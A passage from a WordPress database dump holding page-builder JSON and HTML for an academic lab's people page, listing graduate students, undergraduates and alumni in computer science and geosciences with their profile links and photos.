Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-1663377340901.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1657,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c68\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c67\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c142\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c141\",\"parentId\":\"182-c140\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c140\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c145\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c147\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c145\",\"index\":2,\"id\":\"182-c148\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c145\",\"index\":1,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c150\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Raiyan\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c150\",\"index\":2,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c150\",\"index\":1,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c144\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c143\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c157\",\"parentId\":\"182-c156\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c156\",\"parentId\":\"182-c155\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c155\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c160\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c160\",\"index\":2,\"id\":\"182-c163\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c160\",\"index\":1,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c165\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c165\",\"index\":2,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c165\",\"index\":1,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c170\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c170\",\"index\":2,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c170\",\"index\":1,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c175\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c176\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c175\",\"index\":2,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c175\",\"index\":1,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c180\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c181\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c180\",\"index\":2,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c180\",\"index\":1,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c185\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c186\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c185\",\"index\":2,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c185\",\"index\":1,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c190\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c190\",\"index\":2,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c190\",\"index\":1,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c195\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c196\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":2,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c199\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c201\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c199\",\"index\":2,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c199\",\"index\":1,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c204\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c205\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c204\",\"index\":2,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c204\",\"index\":1,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c159\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c158\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c211\",\"parentId\":\"182-c210\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c210\",\"parentId\":\"182-c209\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c209\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-10-13 10:00:15','2023-10-13 14:00:15','',562,'https://gsudice.dataconn.net/?p=1734',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1735,1,'2023-10-13 10:00:15','2023-10-13 14:00:15','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c64\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c64 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c65-outer\">\n            <div data-colibri-id=\"182-c65\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c65 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-986 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c66\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 